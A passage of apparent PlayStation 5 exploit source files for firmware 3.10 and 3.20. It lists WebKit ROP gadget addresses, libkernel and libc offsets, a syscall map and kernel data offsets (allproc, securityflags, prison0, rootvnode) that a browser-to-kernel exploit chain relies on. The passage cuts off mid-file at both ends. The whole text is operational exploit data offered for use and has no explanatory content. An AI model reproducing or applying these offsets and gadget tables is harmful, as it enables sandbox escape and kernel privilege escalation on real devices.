345 | 0x2A3: 0x33880, // sys_reserve_2mb_page
346 | 0x2A4: 0x34130, // sys_cpumode_yield
347 | 0x2A5: 0x33C40, // sys_wait6
348 | 0x2A6: 0x336A0, // sys_cap_rights_limit
349 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
350 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
351 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32910, // sys_cap_fcntls_get
353 | 0x2AB: 0x34C70, // sys_bindat
354 | 0x2AC: 0x33470, // sys_connectat
355 | 0x2AD: 0x326D0, // sys_chflagsat
356 | 0x2AE: 0x32520, // sys_accept4
357 | 0x2AF: 0x32B10, // sys_pipe2
358 | 0x2B0: 0x33510, // sys_aio_mlock
359 | 0x2B1: 0x34BF0, // sys_procctl
360 | 0x2B2: 0x33EA0, // sys_ppoll
361 | 0x2B3: 0x33DE0, // sys_futimens
362 | 0x2B4: 0x34590, // sys_utimensat
363 | 0x2B5: 0x33B00, // sys_numa_getaffinity
364 | 0x2B6: 0x33960, // sys_numa_setaffinity
365 | 0x2C1: 0x32970, // sys_get_phys_page_size
366 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x331B0, // sys_openintr
368 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
369 | 0x2CE: 0x33290, // sys_acinfo_add
370 | 0x2CF: 0x32500, // sys_acinfo_delete
371 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32750, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x7301;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x317301;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE7301;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.10.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D5B8, //check
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EEDB, //check
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A26823, //check
42 | "add rax, rdx" : 0x016D53B2, //check
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x33B80, // sys_exit
49 | 0x002: 0x34B30, // sys_fork
50 | 0x003: 0x32D50, // sys_read
51 | 0x004: 0x32CB0, // sys_write
52 | 0x005: 0x33350, // sys_open
53 | 0x006: 0x33980, // sys_close
54 | 0x007: 0x32570, // sys_wait4
55 | 0x00A: 0x34670, // sys_unlink
56 | 0x00C: 0x34000, // sys_chdir
57 | 0x00F: 0x33A00, // sys_chmod
58 | 0x014: 0x32ED0, // sys_getpid
59 | 0x017: 0x329D0, // sys_setuid
60 | 0x018: 0x33FE0, // sys_getuid
61 | 0x019: 0x33390, // sys_geteuid
62 | 0x01B: 0x33430, // sys_recvmsg
63 | 0x01C: 0x33660, // sys_sendmsg
64 | 0x01D: 0x341B0, // sys_recvfrom
65 | 0x01E: 0x328D0, // sys_accept
66 | 0x01F: 0x326F0, // sys_getpeername
67 | 0x020: 0x34810, // sys_getsockname
68 | 0x021: 0x34330, // sys_access
69 | 0x022: 0x344B0, // sys_chflags
70 | 0x023: 0x33E80, // sys_fchflags
71 | 0x024: 0x34D60, // sys_sync
72 | 0x025: 0x33330, // sys_kill
73 | 0x027: 0x32DD0, // sys_getppid
74 | 0x029: 0x34390, // sys_dup
75 | 0x02A: 0x32D20, // sys_pipe
76 | 0x02B: 0x349D0, // sys_getegid
77 | 0x02C: 0x34D20, // sys_profil
78 | 0x02F: 0x32870, // sys_getgid
79 | 0x031: 0x32850, // sys_getlogin
80 | 0x032: 0x340E0, // sys_setlogin
81 | 0x035: 0x32A90, // sys_sigaltstack
82 | 0x036: 0x32BF0, // sys_ioctl
83 | 0x037: 0x33EC0, // sys_reboot
84 | 0x038: 0x33DC0, // sys_revoke
85 | 0x03B: 0x340C0, // sys_execve
86 | 0x041: 0x33A60, // sys_msync
87 | 0x049: 0x33250, // sys_munmap
88 | 0x04A: 0x33FC0, // sys_mprotect
89 | 0x04B: 0x33140, // sys_madvise
90 | 0x04E: 0x33310, // sys_mincore
91 | 0x04F: 0x327D0, // sys_getgroups
92 | 0x050: 0x32D70, // sys_setgroups
93 | 0x053: 0x327B0, // sys_setitimer
94 | 0x056: 0x325D0, // sys_getitimer
95 | 0x059: 0x33E20, // sys_getdtablesize
96 | 0x05A: 0x34230, // sys_dup2
97 | 0x05C: 0x33860, // sys_fcntl
98 | 0x05D: 0x333B0, // sys_select
99 | 0x05F: 0x32810, // sys_fsync
100 | 0x060: 0x33740, // sys_setpriority
101 | 0x061: 0x32F90, // sys_socket
102 | 0x062: 0x34020, // sys_connect
103 | 0x063: 0x34990, // sys_netcontrol
104 | 0x064: 0x32590, // sys_getpriority
105 | 0x065: 0x345B0, // sys_netabort
106 | 0x066: 0x34930, // sys_netgetsockinfo
107 | 0x068: 0x34630, // sys_bind
108 | 0x069: 0x338A0, // sys_setsockopt
109 | 0x06A: 0x32B90, // sys_listen
110 | 0x071: 0x33BA0, // sys_socketex
111 | 0x072: 0x33570, // sys_socketclose
112 | 0x074: 0x34D40, // sys_gettimeofday
113 | 0x075: 0x34E20, // sys_getrusage
114 | 0x076: 0x32550, // sys_getsockopt
115 | 0x078: 0x337E0, // sys_readv
116 | 0x079: 0x33640, // sys_writev
117 | 0x07A: 0x34290, // sys_settimeofday
118 | 0x07C: 0x331D0, // sys_fchmod
119 | 0x07D: 0x33A40, // sys_netgetiflist
120 | 0x07E: 0x34910, // sys_setreuid
121 | 0x07F: 0x33530, // sys_setregid
122 | 0x080: 0x34490, // sys_rename
123 | 0x083: 0x334B0, // sys_flock
124 | 0x085: 0x34D80, // sys_sendto
125 | 0x086: 0x34BB0, // sys_shutdown
126 | 0x087: 0x33F40, // sys_socketpair
127 | 0x088: 0x33CE0, // sys_mkdir
128 | 0x089: 0x32F30, // sys_rmdir
129 | 0x08A: 0x32440, // sys_utimes
130 | 0x08C: 0x348D0, // sys_adjtime
131 | 0x08D: 0x33A20, // sys_kqueueex
132 | 0x093: 0x33C80, // sys_setsid
133 | 0x0A5: 0x32770, // sys_sysarch
134 | 0x0B6: 0x34710, // sys_setegid
135 | 0x0B7: 0x325B0, // sys_seteuid
136 | 0x0BC: 0x34770, // sys_stat
137 | 0x0BD: 0x34B70, // sys_fstat
138 | 0x0BE: 0x33550, // sys_lstat
139 | 0x0BF: 0x32C50, // sys_pathconf
140 | 0x0C0: 0x33F00, // sys_fpathconf
141 | 0x0C2: 0x33490, // sys_getrlimit
142 | 0x0C3: 0x33070, // sys_setrlimit
143 | 0x0C4: 0x34690, // sys_getdirentries
144 | 0x0CA: 0x34470, // sys___sysctl
145 | 0x0CB: 0x33B20, // sys_mlock
146 | 0x0CC: 0x34510, // sys_munlock
147 | 0x0CE: 0x32FD0, // sys_futimes
148 | 0x0D1: 0x335B0, // sys_poll
149 | 0x0E8: 0x32670, // sys_clock_gettime
150 | 0x0E9: 0x33AE0, // sys_clock_settime
151 | 0x0EA: 0x34AE0, // sys_clock_getres
152 | 0x0EB: 0x346B0, // sys_ktimer_create
153 | 0x0EC: 0x32E30, // sys_ktimer_delete
154 | 0x0ED: 0x34B90, // sys_ktimer_settime
155 | 0x0EE: 0x34040, // sys_ktimer_gettime
156 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34570, // sys_nanosleep
158 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
159 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
160 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
161 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x341D0, // sys_issetugid
163 | 0x110: 0x34970, // sys_getdents
164 | 0x121: 0x34080, // sys_preadv
165 | 0x122: 0x335D0, // sys_pwritev
166 | 0x136: 0x332D0, // sys_getsid
167 | 0x13B: 0x34790, // sys_aio_suspend
168 | 0x144: 0x32E50, // sys_mlockall
169 | 0x145: 0x34250, // sys_munlockall
170 | 0x147: 0x32F50, // sys_sched_setparam
171 | 0x148: 0x33BC0, // sys_sched_getparam
172 | 0x149: 0x32710, // sys_sched_setscheduler
173 | 0x14A: 0x33590, // sys_sched_getscheduler
174 | 0x14B: 0x333F0, // sys_sched_yield
175 | 0x14C: 0x32990, // sys_sched_get_priority_max
176 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
177 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
178 | 0x154: 0x324A0, // sys_sigprocmask
179 | 0x155: 0x324E0, // sys_sigsuspend
180 | 0x157: 0x343B0, // sys_sigpending
181 | 0x159: 0x344D0, // sys_sigtimedwait
182 | 0x15A: 0x34110, // sys_sigwaitinfo
183 | 0x16A: 0x346F0, // sys_kqueue
184 | 0x16B: 0x32950, // sys_kevent
185 | 0x17B: 0x328F0, // sys_mtypeprotect
186 | 0x188: 0x32A10, // sys_uuidgen
187 | 0x189: 0x34E60, // sys_sendfile
188 | 0x18D: 0x32EB0, // sys_fstatfs
189 | 0x190: 0x32A70, // sys_ksem_close
190 | 0x191: 0x33800, // sys_ksem_post
191 | 0x192: 0x340A0, // sys_ksem_wait
192 | 0x193: 0x34E40, // sys_ksem_trywait
193 | 0x194: 0x32BB0, // sys_ksem_init
194 | 0x195: 0x345D0, // sys_ksem_open
195 | 0x196: 0x342B0, // sys_ksem_unlink
196 | 0x197: 0x32A30, // sys_ksem_getvalue
197 | 0x198: 0x34270, // sys_ksem_destroy
198 | 0x1A0: 0x34750, // sys_sigaction
199 | 0x1A1: 0x343F0, // sys_sigreturn
200 | 0x1A5: 0x330D0, // sys_getcontext
201 | 0x1A6: 0x33E00, // sys_setcontext
202 | 0x1A7: 0x33F20, // sys_swapcontext
203 | 0x1AD: 0x33120, // sys_sigwait
204 | 0x1AE: 0x327F0, // sys_thr_create
205 | 0x1AF: 0x32B50, // sys_thr_exit
206 | 0x1B0: 0x334F0, // sys_thr_self
207 | 0x1B1: 0x32B70, // sys_thr_kill
208 | 0x1B9: 0x34190, // sys_ksem_timedwait
209 | 0x1BA: 0x324C0, // sys_thr_suspend
210 | 0x1BB: 0x32DF0, // sys_thr_wake
211 | 0x1BC: 0x33E60, // sys_kldunloadf
212 | 0x1C6: 0x34B50, // sys__umtx_op
213 | 0x1C7: 0x34890, // sys_thr_new
214 | 0x1C8: 0x347F0, // sys_sigqueue
215 | 0x1D0: 0x34150, // sys_thr_set_name
216 | 0x1D2: 0x33700, // sys_rtprio_thread
217 | 0x1DB: 0x32E90, // sys_pread
218 | 0x1DC: 0x33FA0, // sys_pwrite
219 | 0x1DD: 0x34870, // sys_mmap
220 | 0x1DE: 0x34370, // sys_lseek
221 | 0x1DF: 0x33410, // sys_truncate
222 | 0x1E0: 0x32E70, // sys_ftruncate
223 | 0x1E1: 0x32460, // sys_thr_kill2
224 | 0x1E2: 0x34DE0, // sys_shm_open
225 | 0x1E3: 0x34850, // sys_shm_unlink
226 | 0x1E6: 0x33090, // sys_cpuset_getid
227 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32830, // sys_openat
230 | 0x203: 0x33EE0, // sys___cap_rights_get
231 | 0x20A: 0x33920, // sys_pselect
232 | 0x214: 0x339E0, // sys_regmgr_call
233 | 0x215: 0x33760, // sys_jitshm_create
234 | 0x216: 0x33D40, // sys_jitshm_alias
235 | 0x217: 0x32C30, // sys_dl_get_list
236 | 0x218: 0x33A80, // sys_dl_get_info
237 | 0x21A: 0x339C0, // sys_evf_create
238 | 0x21B: 0x32E10, // sys_evf_delete
239 | 0x21C: 0x33D60, // sys_evf_open
240 | 0x21D: 0x33940, // sys_evf_close
241 | 0x21E: 0x33C00, // sys_evf_wait
242 | 0x21F: 0x343D0, // sys_evf_trywait
243 | 0x220: 0x33D80, // sys_evf_set
244 | 0x221: 0x342F0, // sys_evf_clear
245 | 0x222: 0x33100, // sys_evf_cancel
246 | 0x223: 0x33BE0, // sys_query_memory_protection
247 | 0x224: 0x334D0, // sys_batch_map
248 | 0x225: 0x336E0, // sys_osem_create
249 | 0x226: 0x326B0, // sys_osem_delete
250 | 0x227: 0x32630, // sys_osem_open
251 | 0x228: 0x34C30, // sys_osem_close
252 | 0x229: 0x33CC0, // sys_osem_wait
253 | 0x22A: 0x342D0, // sys_osem_trywait
254 | 0x22B: 0x33F60, // sys_osem_post
255 | 0x22C: 0x33840, // sys_osem_cancel
256 | 0x22D: 0x335F0, // sys_namedobj_create
257 | 0x22E: 0x332F0, // sys_namedobj_delete
258 | 0x22F: 0x34EC0, // sys_set_vm_container
259 | 0x230: 0x32DB0, // sys_debug_init
260 | 0x233: 0x33720, // sys_opmc_enable
261 | 0x234: 0x32790, // sys_opmc_disable
262 | 0x235: 0x337A0, // sys_opmc_set_ctl
263 | 0x236: 0x337C0, // sys_opmc_set_ctr
264 | 0x237: 0x34210, // sys_opmc_get_ctr
265 | 0x23C: 0x33030, // sys_virtual_query
266 | 0x249: 0x34650, // sys_is_in_sandbox
267 | 0x24A: 0x33210, // sys_dmem_container
268 | 0x24B: 0x33AC0, // sys_get_authinfo
269 | 0x24C: 0x32610, // sys_mname
270 | 0x24F: 0x32C10, // sys_dynlib_dlsym
271 | 0x250: 0x32F10, // sys_dynlib_get_list
272 | 0x251: 0x349B0, // sys_dynlib_get_info
273 | 0x252: 0x338C0, // sys_dynlib_load_prx
274 | 0x253: 0x328B0, // sys_dynlib_unload_prx
275 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
277 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32480, // sys_sandbox_path
279 | 0x259: 0x32FF0, // sys_mdbg_service
280 | 0x25A: 0x33680, // sys_randomized_path
281 | 0x25B: 0x344F0, // sys_rdup
282 | 0x25C: 0x32AF0, // sys_dl_get_metadata
283 | 0x25D: 0x33230, // sys_workaround8849
284 | 0x25E: 0x329F0, // sys_is_development_mode
285 | 0x25F: 0x33B60, // sys_get_self_auth_info
286 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
287 | 0x262: 0x34EA0, // sys_budget_get_ptype
288 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x34C10, // sys_get_proc_type_info
290 | 0x265: 0x32420, // sys_get_resident_count
291 | 0x267: 0x33780, // sys_get_resident_fmem_count
292 | 0x268: 0x34830, // sys_thr_get_name
293 | 0x269: 0x33E40, // sys_set_gpo
294 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32930, // sys_test_debug_rwmem
296 | 0x26C: 0x32A50, // sys_free_stack
297 | 0x26E: 0x32650, // sys_ipmimgr_call
298 | 0x26F: 0x33AA0, // sys_get_gpo
299 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
300 | 0x271: 0x34430, // sys_opmc_set_hw
301 | 0x272: 0x32F70, // sys_opmc_get_hw
302 | 0x273: 0x325F0, // sys_get_cpu_usage_all
303 | 0x274: 0x33C60, // sys_mmap_dmem
304 | 0x275: 0x33010, // sys_physhm_open
305 | 0x276: 0x33820, // sys_physhm_unlink
306 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
307 | 0x279: 0x332B0, // sys_thr_resume_ucontext
308 | 0x27A: 0x33270, // sys_thr_get_ucontext
309 | 0x27B: 0x33370, // sys_thr_set_ucontext
310 | 0x27C: 0x32FB0, // sys_set_timezone_info
311 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
312 | 0x27E: 0x330B0, // sys_utc_to_localtime
313 | 0x27F: 0x34EE0, // sys_localtime_to_utc
314 | 0x280: 0x34060, // sys_set_uevt
315 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
316 | 0x282: 0x33450, // sys_get_map_statistics
317 | 0x283: 0x341F0, // sys_set_chicken_switches
318 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
319 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
320 | 0x288: 0x32690, // sys_app_state_change
321 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32730, // sys_process_terminate
323 | 0x28D: 0x32EF0, // sys_blockpool_open
324 | 0x28E: 0x32C90, // sys_blockpool_map
325 | 0x28F: 0x346D0, // sys_blockpool_unmap
326 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x333D0, // sys_blockpool_batch
328 | 0x292: 0x32B30, // sys_fdatasync
329 | 0x293: 0x33050, // sys_dynlib_get_list2
330 | 0x294: 0x34DA0, // sys_dynlib_get_info2
331 | 0x295: 0x34550, // sys_aio_submit
332 | 0x296: 0x32AD0, // sys_aio_multi_delete
333 | 0x297: 0x33900, // sys_aio_multi_wait
334 | 0x298: 0x329B0, // sys_aio_multi_poll
335 | 0x299: 0x34450, // sys_aio_get_data
336 | 0x29A: 0x338E0, // sys_aio_multi_cancel
337 | 0x29B: 0x32890, // sys_get_bio_usage_all
338 | 0x29C: 0x33F80, // sys_aio_create
339 | 0x29D: 0x349F0, // sys_aio_submit_cmd
340 | 0x29E: 0x348F0, // sys_aio_init
341 | 0x29F: 0x34350, // sys_get_page_table_stats
342 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x34950, // sys_blockpool_move
344 | 0x2A2: 0x347D0, // sys_virtual_query_all
345 | 0x2A3: 0x33880, // sys_reserve_2mb_page
346 | 0x2A4: 0x34130, // sys_cpumode_yield
347 | 0x2A5: 0x33C40, // sys_wait6
348 | 0x2A6: 0x336A0, // sys_cap_rights_limit
349 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
350 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
351 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32910, // sys_cap_fcntls_get
353 | 0x2AB: 0x34C70, // sys_bindat
354 | 0x2AC: 0x33470, // sys_connectat
355 | 0x2AD: 0x326D0, // sys_chflagsat
356 | 0x2AE: 0x32520, // sys_accept4
357 | 0x2AF: 0x32B10, // sys_pipe2
358 | 0x2B0: 0x33510, // sys_aio_mlock
359 | 0x2B1: 0x34BF0, // sys_procctl
360 | 0x2B2: 0x33EA0, // sys_ppoll
361 | 0x2B3: 0x33DE0, // sys_futimens
362 | 0x2B4: 0x34590, // sys_utimensat
363 | 0x2B5: 0x33B00, // sys_numa_getaffinity
364 | 0x2B6: 0x33960, // sys_numa_setaffinity
365 | 0x2C1: 0x32970, // sys_get_phys_page_size
366 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x331B0, // sys_openintr
368 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
369 | 0x2CE: 0x33290, // sys_acinfo_add
370 | 0x2CF: 0x32500, // sys_acinfo_delete
371 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32750, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x7062;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x317062;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE7062;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.20.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D658,
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EF7B,
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A269F3,
42 | "add rax, rdx" : 0x016D5582,
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x33B80, // sys_exit
49 | 0x002: 0x34B30, // sys_fork
50 | 0x003: 0x32D50, // sys_read
51 | 0x004: 0x32CB0, // sys_write
52 | 0x005: 0x33350, // sys_open
53 | 0x006: 0x33980, // sys_close
54 | 0x007: 0x32570, // sys_wait4
55 | 0x00A: 0x34670, // sys_unlink
56 | 0x00C: 0x34000, // sys_chdir
57 | 0x00F: 0x33A00, // sys_chmod
58 | 0x014: 0x32ED0, // sys_getpid
59 | 0x017: 0x329D0, // sys_setuid
60 | 0x018: 0x33FE0, // sys_getuid
61 | 0x019: 0x33390, // sys_geteuid
62 | 0x01B: 0x33430, // sys_recvmsg
63 | 0x01C: 0x33660, // sys_sendmsg
64 | 0x01D: 0x341B0, // sys_recvfrom
65 | 0x01E: 0x328D0, // sys_accept
66 | 0x01F: 0x326F0, // sys_getpeername
67 | 0x020: 0x34810, // sys_getsockname
68 | 0x021: 0x34330, // sys_access
69 | 0x022: 0x344B0, // sys_chflags
70 | 0x023: 0x33E80, // sys_fchflags
71 | 0x024: 0x34D60, // sys_sync
72 | 0x025: 0x33330, // sys_kill
73 | 0x027: 0x32DD0, // sys_getppid
74 | 0x029: 0x34390, // sys_dup
75 | 0x02A: 0x32D20, // sys_pipe
76 | 0x02B: 0x349D0, // sys_getegid
77 | 0x02C: 0x34D20, // sys_profil
78 | 0x02F: 0x32870, // sys_getgid
79 | 0x031: 0x32850, // sys_getlogin
80 | 0x032: 0x340E0, // sys_setlogin
81 | 0x035: 0x32A90, // sys_sigaltstack
82 | 0x036: 0x32BF0, // sys_ioctl
83 | 0x037: 0x33EC0, // sys_reboot
84 | 0x038: 0x33DC0, // sys_revoke
85 | 0x03B: 0x340C0, // sys_execve
86 | 0x041: 0x33A60, // sys_msync
87 | 0x049: 0x33250, // sys_munmap
88 | 0x04A: 0x33FC0, // sys_mprotect
89 | 0x04B: 0x33140, // sys_madvise
90 | 0x04E: 0x33310, // sys_mincore
91 | 0x04F: 0x327D0, // sys_getgroups
92 | 0x050: 0x32D70, // sys_setgroups
93 | 0x053: 0x327B0, // sys_setitimer
94 | 0x056: 0x325D0, // sys_getitimer
95 | 0x059: 0x33E20, // sys_getdtablesize
96 | 0x05A: 0x34230, // sys_dup2
97 | 0x05C: 0x33860, // sys_fcntl
98 | 0x05D: 0x333B0, // sys_select
99 | 0x05F: 0x32810, // sys_fsync
100 | 0x060: 0x33740, // sys_setpriority
101 | 0x061: 0x32F90, // sys_socket
102 | 0x062: 0x34020, // sys_connect
103 | 0x063: 0x34990, // sys_netcontrol
104 | 0x064: 0x32590, // sys_getpriority
105 | 0x065: 0x345B0, // sys_netabort
106 | 0x066: 0x34930, // sys_netgetsockinfo
107 | 0x068: 0x34630, // sys_bind
108 | 0x069: 0x338A0, // sys_setsockopt
109 | 0x06A: 0x32B90, // sys_listen
110 | 0x071: 0x33BA0, // sys_socketex
111 | 0x072: 0x33570, // sys_socketclose
112 | 0x074: 0x34D40, // sys_gettimeofday
113 | 0x075: 0x34E20, // sys_getrusage
114 | 0x076: 0x32550, // sys_getsockopt
115 | 0x078: 0x337E0, // sys_readv
116 | 0x079: 0x33640, // sys_writev
117 | 0x07A: 0x34290, // sys_settimeofday
118 | 0x07C: 0x331D0, // sys_fchmod
119 | 0x07D: 0x33A40, // sys_netgetiflist
120 | 0x07E: 0x34910, // sys_setreuid
121 | 0x07F: 0x33530, // sys_setregid
122 | 0x080: 0x34490, // sys_rename
123 | 0x083: 0x334B0, // sys_flock
124 | 0x085: 0x34D80, // sys_sendto
125 | 0x086: 0x34BB0, // sys_shutdown
126 | 0x087: 0x33F40, // sys_socketpair
127 | 0x088: 0x33CE0, // sys_mkdir
128 | 0x089: 0x32F30, // sys_rmdir
129 | 0x08A: 0x32440, // sys_utimes
130 | 0x08C: 0x348D0, // sys_adjtime
131 | 0x08D: 0x33A20, // sys_kqueueex
132 | 0x093: 0x33C80, // sys_setsid
133 | 0x0A5: 0x32770, // sys_sysarch
134 | 0x0B6: 0x34710, // sys_setegid
135 | 0x0B7: 0x325B0, // sys_seteuid
136 | 0x0BC: 0x34770, // sys_stat
137 | 0x0BD: 0x34B70, // sys_fstat
138 | 0x0BE: 0x33550, // sys_lstat
139 | 0x0BF: 0x32C50, // sys_pathconf
140 | 0x0C0: 0x33F00, // sys_fpathconf
141 | 0x0C2: 0x33490, // sys_getrlimit
142 | 0x0C3: 0x33070, // sys_setrlimit
143 | 0x0C4: 0x34690, // sys_getdirentries
144 | 0x0CA: 0x34470, // sys___sysctl
145 | 0x0CB: 0x33B20, // sys_mlock
146 | 0x0CC: 0x34510, // sys_munlock
147 | 0x0CE: 0x32FD0, // sys_futimes
148 | 0x0D1: 0x335B0, // sys_poll
149 | 0x0E8: 0x32670, // sys_clock_gettime
150 | 0x0E9: 0x33AE0, // sys_clock_settime
151 | 0x0EA: 0x34AE0, // sys_clock_getres
152 | 0x0EB: 0x346B0, // sys_ktimer_create
153 | 0x0EC: 0x32E30, // sys_ktimer_delete
154 | 0x0ED: 0x34B90, // sys_ktimer_settime
155 | 0x0EE: 0x34040, // sys_ktimer_gettime
156 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34570, // sys_nanosleep
158 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
159 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
160 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
161 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x341D0, // sys_issetugid
163 | 0x110: 0x34970, // sys_getdents
